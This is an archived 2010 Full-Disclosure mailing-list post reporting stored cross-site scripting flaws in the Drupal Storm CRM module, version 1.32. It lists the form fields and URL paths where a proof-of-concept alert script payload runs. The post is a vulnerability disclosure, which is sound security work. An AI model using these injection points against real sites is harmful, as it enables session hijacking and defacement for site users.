lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 12 May 2010 15:11:13 -0400
From: Black Packeteer <black.packeteer@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Drupal storm 1.32

Drupal Storm module is a CRM type module that allows you to make orgs,
people, tasks, and project.  It is used on thousands of sites according to
http://drupal.org/project/usage/storm.  Storm version 1.32 have a lots of
cross site scripting vulns.

Sploits -
*  Make or view a Storm organization at ?q=node/add/stormorganization
*  <script>alert('sploit');</script> for the Fullname, address, city, state,
phone, and taxid values
*  Save and watch scripts

*  Make new person, ?q=node/add/stormperson
*  <script>alert('sploit');</script> for the Name, enter and save it
*  Make new project at ?q=node/add/stormproject, use anything and save
*  Make new task at ?q=node/add/stormtask using this:
*  <script>alert('sploit');</script> for Step no. and Title
*  Go at ?q=node/add/stormticket
*  Change twice the 'Project:' drop-down to see js alerts

*  Make new ticket at ?q=node/add/stormticket
*  Go to Timetracking screen at ?q=node/add/stormtimetracking
*  Change the 'Project:' drop-down to view alerts

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists